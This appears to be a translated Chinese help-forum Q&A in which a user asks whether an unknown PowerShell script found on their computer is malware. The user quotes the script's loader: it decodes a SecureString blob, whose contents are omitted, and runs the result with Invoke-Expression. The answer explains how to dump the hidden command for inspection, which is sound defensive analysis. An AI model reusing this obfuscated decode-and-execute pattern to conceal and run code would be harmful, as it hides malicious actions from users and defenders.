具有可疑内容的未知 PowerShell 脚本:恶意软件?

具有可疑内容的未知 PowerShell 脚本:恶意软件?

5cfdf61c454c1fc5e9f0fcad2d12d5ef.ps1我在我的电脑上发现了一个名为的脚本:

$pyfwthc = # this is just a TON of random letters and numbers didnt wanna waste the space and its probably not important (encrypted maybe?)
$sstring = ConvertTo-SecureString $pyfwthc
$script = (New-Object system.Management.Automation.PSCredential("pyfwthc", $sstring)).GetNetworkCredential().Password
Invoke-Expression $script

这是我应该担心的事情吗?

答案1

让我们分解一下。

更新:正如其他用户指出的那样,它正在将密码字符串作为命令运行。您需要将 $script 的值转储到文件中,以便查看它正在运行的内容:

从脚本中删除最后一行并运行:

echo $script > this_is_the_script.file

相关内容